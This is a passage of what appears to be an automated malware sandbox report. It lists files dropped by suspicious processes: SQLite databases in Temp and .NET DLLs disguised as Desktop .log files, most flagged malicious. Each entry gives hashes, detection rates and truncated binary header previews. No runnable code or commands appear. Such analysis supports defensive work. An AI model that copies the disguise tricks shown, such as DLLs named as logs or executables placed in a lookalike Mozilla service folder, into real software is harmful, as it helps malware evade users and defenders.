                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\y7vsR4YYHe

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yK7ksGTIPk

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yLbRMBQSN5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yS7wlJZQUw

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yfcho4F9nV

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zRaJSGVHRg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zT3b9Z1tRu

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zhYcIBF9jM

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zz5HLcZAYc

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\AyILZeLM.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34304
                                                                    Entropy (8bit):5.618776214605176
                                                                    Encrypted:false
                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: 8G3thfOYd2.exe, Detection: malicious, Browse
                                                                    • Filename: z28NBu7i9a.exe, Detection: malicious, Browse
                                                                    • Filename: fzUk1a18ai.exe, Detection: malicious, Browse
                                                                    • Filename: 3BZPHrgjMP.exe, Detection: malicious, Browse
                                                                    • Filename: 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe, Detection: malicious, Browse
                                                                    • Filename: tQxaElvX5D.exe, Detection: malicious, Browse
                                                                    • Filename: 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe, Detection: malicious, Browse
                                                                    • Filename: 4y2bJd0meT.exe, Detection: malicious, Browse
                                                                    • Filename: 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe, Detection: malicious, Browse
                                                                    • Filename: Px0b16q72c.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\BvjTveaH.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\CNmCQxgq.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):50176
                                                                    Entropy (8bit):5.723168999026349
                                                                    Encrypted:false
                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\DKOKmxvl.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):294912
                                                                    Entropy (8bit):6.010605469502259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                    C:\Users\user\Desktop\DjncgsWF.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                    C:\Users\user\Desktop\EgPkCslz.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):46592
                                                                    Entropy (8bit):5.870612048031897
                                                                    Encrypted:false
                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\EySSXLrj.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38912
                                                                    Entropy (8bit):5.679286635687991
                                                                    Encrypted:false
                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\HAEBtuve.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34816
                                                                    Entropy (8bit):5.636032516496583
                                                                    Encrypted:false
                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\MjOKfqVp.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):41472
                                                                    Entropy (8bit):5.6808219961645605
                                                                    Encrypted:false
                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\NcaIHEGQ.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                    C:\Users\user\Desktop\PZEBmnVi.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):64000
                                                                    Entropy (8bit):5.857602289000348
                                                                    Encrypted:false
                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
